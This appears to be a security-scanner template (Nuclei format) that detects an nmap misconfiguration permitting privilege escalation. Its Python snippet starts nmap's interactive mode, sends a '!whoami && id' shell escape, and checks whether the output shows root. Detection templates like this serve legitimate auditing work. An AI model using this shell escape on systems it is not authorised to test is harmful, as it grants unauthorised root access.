id: nmap-privesc
info:
  name: Nmap – Privilege Escalation
  author: pussycat0x
  severity: high
  description: |
    Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation.
  reference:
    - https://gtfobins.github.io/gtfobins/nmap/
  metadata:
    verified: true
  tags: code,linux,nmap,privesc,enum

self-contained: true
code:
  - engine:
      - py
      - python3
    source: |
      import subprocess
      nmap_process = subprocess.Popen(["nmap", "--interactive"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
      nmap_process.stdin.write(b"!whoami && id")
      nmap_process.stdin.flush()
      output, _ = nmap_process.communicate()
      print(output.decode("utf-8"))

    matchers:
      - type: word
        words:
          - "root"
          - "groups=0(root)"
        condition: and
# digest: 4a0a0047304502201a816c89ebc72320fce398d1a7196a0f5ffe30bb3b043ae1b78df0f99bc8366d022100f213b78c0d429f7d963d2dc968e128132b066f48bec6aaa945c1466c7a258ab4:c8251d2f4b494560fa261588bedfe7b7
